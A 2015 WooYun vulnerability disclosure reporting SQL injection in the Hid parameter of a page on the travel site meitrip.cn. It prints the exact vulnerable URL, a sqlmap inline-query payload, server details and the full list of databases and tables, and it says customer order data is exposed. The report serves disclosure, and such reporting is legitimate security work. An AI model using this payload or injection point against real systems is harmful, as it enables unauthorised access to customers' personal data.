当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-095890

漏洞标题:美程旅行网存在SQL注入漏洞泄露大量用户敏感数据

相关厂商:美程旅行网

漏洞作者: 中央军

提交时间:2015-02-06 10:41

修复时间:2015-03-23 10:42

公开时间:2015-03-23 10:42

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:20

漏洞状态:未联系到厂商或者厂商积极忽略

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2015-02-06: 积极联系厂商并且等待厂商认领中,细节不对外公开
2015-03-23: 厂商已经主动忽略漏洞,细节向公众公开

简要描述:

美程旅行网(www.meitrip.cn www.meitrip.com)成立于2003年,经过几年的发展,已经成本全国领先的在线旅游服务商。公司本着“专业品质,用心服务”的精神,为广大商务旅游的顾客提供可靠、安全、全面的旅游、商务服务。不仅为广大商旅客人解决了旅游住宿的各种烦扰,公司也得到了长足的发展,同时也取得了良好的社会效益和经济效益。 今后,美程旅行网将不断完善服务体系,提高业务水平,为广大商旅朋友提供更优质的酒店预定、打折机票及各种旅游资讯服务。

详细说明:

美程旅行网

http://www.meitrip.cn

存在SQL注入,出现问题的地方

http://www.meitrip.cn/private/GetGardenRoom.aspx?Hid=110602

Hid参数有问题。

<sqlmap identified the following injection points with a total of 69 HTTP(s) requests:
---
Place: GET
Parameter: Hid
Type: inline query
Title: Microsoft SQL Server/Sybase inline queries
Payload: Hid=(SELECT CHAR(113)+CHAR(106)+CHAR(115)+CHAR(119)+CHAR(113)+(SELECT (CASE WHEN (9450=9450) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(113)+CHAR(118)+CHAR(119)+CHAR(119)+CHAR(113))
---
web server operating system: Windows 2003 or XP
web application technology: ASP.NET, ASP.NET 4.0.30319, Microsoft IIS 6.0
back-end DBMS: Microsoft SQL Server 2005
available databases [6]:
[*] master
[*] model
[*] msdb
[*] new_hotel
[*] new_hotel_old
[*] tempdb


new_hotel库:

sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Place: GET
Parameter: Hid
Type: inline query
Title: Microsoft SQL Server/Sybase inline queries
Payload: Hid=(SELECT CHAR(113)+CHAR(106)+CHAR(115)+CHAR(119)+CHAR(113)+(SELECT (CASE WHEN (9450=9450) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(113)+CHAR(118)+CHAR(119)+CHAR(119)+CHAR(113))
---
web server operating system: Windows 2003 or XP
web application technology: ASP.NET, ASP.NET 4.0.30319, Microsoft IIS 6.0
back-end DBMS: Microsoft SQL Server 2005
Database: new_hotel
[226 tables]
+-------------------------------+
| AdminInfo |
| AdminOperateRecords |
| Airport |
| Answers |
| ApplicationConfig |
| Area |
| AsianGamesVenue |
| BonusDetail |
| BonusType |
| CantonfairGuide |
| CantonfairIntro |
| CantonfairMaintype |
| CantonfairMenuFirst |
| CantonfairMenuSecond |
| CantonfairMenuThird |
| CantonfairNews |
| CantonfairNewsType |
| CantonfairSkill |
| CantonfairStage |
| CantonfairSubClass |
| CantonfairSubType |
| ChainBrands |
| ChainHotel |
| ChainInfo |
| ChainType |
| City |
| Commission |
| CommissionType |
| Company |
| CompanyBank |
| ConfirmType |
| Country |
| Creditcard |
| CreditcardType |
| CurrencyType |
| Customer |
| CustomerEnInfo |
| CustomerLinkMan |
| CustomerPoint |
| CustomerRating |
| D99_Tmp |
| DestGuides |
| Destinations |
| EduHoetl |
| ElongGift |
| ElongRoomType |
| Employee |
| EnAnswers |
| EnExpoInfo |
| EnKeywords |
| EnNews |
| EnNewsComment |
| EnQuestions |
| ExpoInfo |
| Familymembers |
| FavoritesHotel |
| Feedback |
| Feedbacktype |
| Financial |
| FriendlyLink |
| GZ365_viewQuestions |
| GZ_viewQuestions |
| GaranteeRules |
| GuangJiaoHui |
| HotSearchKey |
| HotelBonusComment |
| HotelBonusPicture |
| HotelBreakfastType |
| HotelComment |
| HotelCommission |
| HotelCommissionToCustomer |
| HotelCoordinates |
| HotelEnComment |
| HotelInfo |
| HotelInfoSearchRanking |
| HotelInfoSearchRankingHistory |
| HotelInfo_test2 |
| HotelInfotemp20140816 |
| HotelInstallationModel |
| HotelLinkInfo |
| HotelLinkInfo20140816 |
| HotelNews |
| HotelOfficialLink |
| HotelOfficialUrl |
| HotelOfficialUrl_temp2 |
| HotelOfficialUrltemp20140823 |
| HotelPicture |
| HotelPricingByDate |
| HotelPromotions |
| HotelStar |
| HotelStaticUrl |
| HotelTel |
| Information |
| InformationComment |
| InformationType |
| InformationView |
| Keywords |
| LandMarkType |
| LandMarks |
| MarketingStaff |
| MemberCard |
| MenuList |
| MenuPermission |
| MetroExit |
| MetroInfo |
| ModelBedType |
| ModelBreakfast |
| ModelBroadband |
| ModelCreditCard |
| ModelDining |
| ModelLeisure |
| ModelMeeting |
| ModelRoomEquip |
| ModelServices |
| News |
| NewsComment |
| NewsOfAdmin |
| NewsOfHotel |
| NewsType |
| NightlyRate |
| Offer_News |
| OfficalSimpOrder |
| OftenPeople |
| OftenPeopleType |
| OrderConfirm |
| OrderDetailsInfo |
| OrderDetailsInfoTemp20140830 |
| OrderInfo |
| OrderInfoTemp |
| OrderInfoTemp2 |
| OrderInfoTemp20140830 |
| OrderInfo_temp3 |
| OrderOperateRecords |
| OrderPayType |
| OrderState |
| OrderTel |
| OrderType |
| Order_Mark |
| OrderpayState |
| PaperType |
| Partener |
| PayType |
| PromoCode |
| ProvderSetCommission |
| Provider |
| ProviderCommission |
| Province |
| QuestionType |
| Questions |
| Room |
| RoomBonusByDate |
| RoomFullHouse |
| RoomPicture |
| RoomPricingTypeByDate |
| RoomTypeImage |
| Room_Yuprice |
| Room_YupriceByDate |
| SendMailTemplet |
| SendMialSys |
| Sight |
| Station |
| Street |
| SystemConfig |
| TempHotelInfo |
| TrafficLocation |
| TreatmentState |
| UpsetInfo |
| UsualHotel |
| VIEWHot_Hotel |
| View365Comment |
| View365PicBounds |
| ViewArea |
| ViewBonusHotelList |
| ViewEnCantonFair |
| ViewEnComment |
| ViewEnExpos |
| ViewEnHotelSearch |
| ViewEnMyOrders |
| ViewEnNews |
| ViewEnQuestions |
| ViewHotelSearch |
| ViewHotelSearchInWinForm |
| ViewLandMarkHotel |
| ViewMetor |
| ViewPromotions |
| ViewProvince |
| ViewStreet |
| View_Chain_Hotel |
| WebSiteInfo |
| Withdraw |
| Withdrawstatus |
| Workexperience |
| ZjType |
| comd_list |
| coocoodorder |
| dtproperties |
| duizhang |
| duizhangType |
| hotelinfotemp20140823 |
| jiesuanType |
| pangolin_test_table |
| tb_link |
| tempHave |
| tempNo |
| temporderinfo20140920 |
| test |
| test2_HotelLinkInfo |
| test3_HotelLinkInfo |
| test_HotelLinkInfo |
| test_hotelinfo |
| view365DisplayComment |
| viewCantonFair |
| viewCantonfairNews |
| viewChainHotel |
| viewCityAriport |
| viewCityStation |
| viewComment |
| viewEduHotel |
| viewExpos |
| viewHotelComment |
| viewHotelEnComment |
| viewMyOrders |
| viewMyPoint |
| viewNewHotels |
| viewNews |
| viewQuestions |
+-------------------------------+


选OrderInfo 表中的某些字段来看看吧,好几万信息:

1.jpg

漏洞证明:

修复方案:

版权声明:转载请注明来源 中央军@乌云


漏洞回应

厂商回应:

未能联系到厂商或者厂商积极拒绝